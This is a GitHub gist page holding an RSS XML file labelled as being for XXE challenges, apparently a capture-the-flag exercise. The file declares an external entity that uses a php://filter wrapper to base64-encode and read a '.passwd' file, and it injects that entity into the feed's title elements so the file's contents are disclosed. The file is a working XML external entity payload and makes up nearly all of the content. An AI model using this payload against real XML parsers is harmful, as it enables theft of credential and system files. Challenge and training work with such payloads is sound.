Skip to content

Instantly share code, notes, and snippets.

@NitriKx
Last active May 20, 2025 14:36
Show Gist options
  • Save NitriKx/534282217cdf96bc1e5efa1995be19d1 to your computer and use it in GitHub Desktop.
Save NitriKx/534282217cdf96bc1e5efa1995be19d1 to your computer and use it in GitHub Desktop.
File for the XXE challenges
<?xml version="1.0" ?>
<!DOCTYPE title [ <!ELEMENT title ANY >
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=.passwd" >]>
<rss version="2.0">
<channel>
<title>Ajax et XML&xxe;</title>
<link>https://www.xul.fr/</link>
<description>L'interface graphique XML etc...</description>
<image>
<url>http:///www.xul.fr/xul-icon.gif</url>
<link>http:///www.xul.fr/index.php</link>
</image>
<item>
<title>Nouvelle du jour&xxe;</title>
<link>https://www.xul.fr/xml-rss.html</link>
<description>Tout savoir sur RSS</description>
</item>
<item>
<title>Nouvelle du lendemain</title>
<link>https://www.xul.fr/xml-rdf.php</link>
<description>Et tout savoir sur RDF</description>
</item>
</channel>
</rss>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment